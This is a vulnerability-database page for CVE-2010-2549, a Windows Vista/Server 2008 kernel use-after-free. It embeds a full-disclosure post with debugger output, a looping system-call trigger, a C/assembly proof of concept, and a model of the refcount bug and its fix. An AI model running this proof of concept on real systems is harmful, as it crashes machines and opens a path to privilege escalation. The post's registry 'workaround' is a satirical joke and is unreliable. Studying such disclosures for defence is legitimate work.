CVE-2010-2549 : Detail

CVE-2010-2549

3.81%V4
Local
2010-07-02 16:30 +00:00
2017-09-18 10:57 +00:00

CVE Description

Use-after-free vulnerability in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges or cause a denial of service (system crash) by using a large number of calls to the NtUserCheckAccessForIntegrityLevel function to trigger a failure in the LockProcessByClientId function, leading to deletion of an in-use process object, aka "Win32k Reference Count Vulnerability."

CVE Information

Related Weaknesses

CWE-ID   Weakness name                            Source
CWE-399  Category: Resource Management Errors
         Weaknesses in this category are related to improper management of system resources.

Metrics

Metric  Score  Severity  CVSS Vector                    Source
V2      7.2              AV:L/AC:L/Au:N/C:C/I:C/A:C     nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the likelihood that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore serves to compare a CVE's EPSS score against those of other CVEs.

Exploit Information

Exploit Database EDB-ID: 14156

Publication date: 2010-06-30 22:00 +00:00
Author: MSRC
EDB Verified: Yes

Windows Vista/Server 2008 NtUserCheckAccessForIntegrityLevel Use-after-free Vulnerability

Intro:

Due to hostility toward security researchers, the most recent example being of Tavis Ormandy, a number of us from the industry (and some not from the industry) have come together to form MSRC: the Microsoft-Spurned Researcher Collective. MSRC will fully disclose vulnerability information discovered in our free time, free from retaliation against us or any inferred employer.

Vulnerability report:

win32k!NtUserCheckAccessForIntegrityLevel in Vista/Server 2008 calls LockProcessByClientId() on the specified ClientID. When this call fails, the refcount will be first decremented by nt!ObfDereferenceObject and then by win32k!NtUserCheckAccessForIntegrityLevel again, resulting in a refcount leak. The refcount leak can be abused to have an in-use process object deleted. (use-after-free)

Some debugging info:

    kd> vertarget
    Windows Server 2008 Kernel Version 6002 (SP2)
    kd> LM m win32k
    start    end        module name
    8d460000 8d663000   win32k
    kd> BA e 1 8d58d710 "dt nt!_OBJECT_HEADER @edx PointerCount; g"
    kd> g
       +0x000 PointerCount : 145
       +0x000 PointerCount : 144
       +0x000 PointerCount : 143
       ...
       +0x000 PointerCount : 3
       +0x000 PointerCount : 2
       +0x000 PointerCount : 1
    *** Fatal System Error: 0x00000018
    kd> kc
    nt!KeBugCheck2
    nt!ObfDereferenceObject
    win32k!NtUserCheckAccessForIntegrityLevel
    nt!KiFastCallEntry

The vulnerability can be triggered in one line below, where 4 is just the PID of PsInitialSystemProcess.

    while (1) NtUserCheckAccessForIntegrityLevel(4, 0, NULL);

Since there's no exported stub for this system call, you'll have to craft the call manually. sysenter is your friend. http://j00ru.vexillium.org/win32k_syscalls/

POC:

    #include <windows.h>

    /* win32k system-call number used for NtUserCheckAccessForIntegrityLevel */
    #define LEAK_ME 0x1151

    int main(int argc, char *argv[])
    {
        /* get us some win32k! */
        LoadLibrary("user32");

        while (1) {
            __asm {
                mov eax, LEAK_ME        /* system-call number in eax */
                push 0                  /* arguments (4, 0, NULL), pushed last first */
                push 0
                push 4
                lea edx, dword ptr [esp]  /* edx points at the argument block */
                int 0x2e                /* legacy software-interrupt syscall entry */
            }
        }
    }

Workaround:

Microsoft can workaround these advisories by locating the following registry key: HKCU\Microsoft\Windows\CurrentVersion\Security and changing the "OurJob" boolean value to FALSE.

We at MSRC would like to help you, the users, work around this issue, but PatchGuard will not allow us ;-(

Current MSRC Members (alphabetical order!):

XX XXXXXX XXXX XXXXXXXX XXXXX XXX XXXXXXX XXXXXXX XXXXXX XXXXXXXXX XXXXX XXXXXXXX

If you wish to responsibly disclose a vulnerability through full disclosure or want to join our team, fire off an email to: msrc-disclosure () hushmail com

We do have a vetting process by the way, for any Microsoft employees trying to join ;-)
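The failure-path double dereference the advisory describes, as an added example modelled in plain C (not the advisory's code and not Windows source): object_t, lock_by_id() and both callers are hypothetical stand-ins for the object header's PointerCount, LockProcessByClientId() and NtUserCheckAccessForIntegrityLevel(). The buggy caller drops one reference per failed call until the count reaches zero and the object is deleted under its remaining holders; the fixed caller releases only references the lookup actually granted.

```c
/* Constructed model of the refcount bug pattern described in the advisory.
 * Not Windows code: object_t, lock_by_id() and the two callers are
 * hypothetical stand-ins for _OBJECT_HEADER.PointerCount,
 * LockProcessByClientId() and NtUserCheckAccessForIntegrityLevel(). */
#include <stdbool.h>

typedef struct {
    long pointer_count;  /* stands in for _OBJECT_HEADER.PointerCount */
    bool freed;          /* set when the count hits zero: object deleted */
} object_t;

static void obj_reference(object_t *o) { o->pointer_count++; }
static void obj_dereference(object_t *o) {
    /* reaching zero deletes the object even though other holders still use it */
    if (--o->pointer_count == 0)
        o->freed = true;
}

/* Stand-in for LockProcessByClientId(): takes a reference during lookup and,
 * on failure, drops that reference itself before returning false. */
static bool lock_by_id(object_t *o, bool lookup_succeeds) {
    obj_reference(o);
    if (lookup_succeeds)
        return true;
    obj_dereference(o);  /* callee cleans up its own reference */
    return false;
}

/* Buggy caller: dereferences on the failure path too, dropping a reference
 * it never owned on every failed call (the leak the advisory describes). */
static void caller_buggy(object_t *o, bool lookup_succeeds) {
    lock_by_id(o, lookup_succeeds);
    obj_dereference(o);  /* wrong when the lock failed: second decrement */
}

/* Corrected caller: releases a reference only if the lookup granted one. */
static void caller_fixed(object_t *o, bool lookup_succeeds) {
    if (!lock_by_id(o, lookup_succeeds))
        return;  /* nothing to drop; the callee already released it */
    obj_dereference(o);
}

/* Drives n failing calls through a caller; returns the remaining count, or
 * -1 once the object has been freed out from under its original holders. */
static long run_failing_calls(void (*caller)(object_t *, bool), long start, int n) {
    object_t o = { start, false };
    for (int i = 0; i < n; i++) {
        caller(&o, false);
        if (o.freed)
            return -1;
    }
    return o.pointer_count;
}
```

Starting from the 145 references seen in the debugger transcript, the buggy caller frees the object on the 145th failed call while the fixed caller leaves the count untouched however many calls fail.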

Products Mentioned

Configuration 0

Microsoft >> Windows_server_2008 >> Version *
Microsoft >> Windows_server_2008 >> Version -
Microsoft >> Windows_vista >> Version *

References

http://seclists.org/fulldisclosure/2010/Jul/3
Tags: mailing-list, x_refsource_FULLDISC
http://www.exploit-db.com/exploits/14156
Tags: exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/41280
Tags: vdb-entry, x_refsource_BID
http://secunia.com/advisories/40421
Tags: third-party-advisory, x_refsource_SECUNIA
http://www.us-cert.gov/cas/techalerts/TA10-285A.html
Tags: third-party-advisory, x_refsource_CERT
http://osvdb.org/66003
Tags: vdb-entry, x_refsource_OSVDB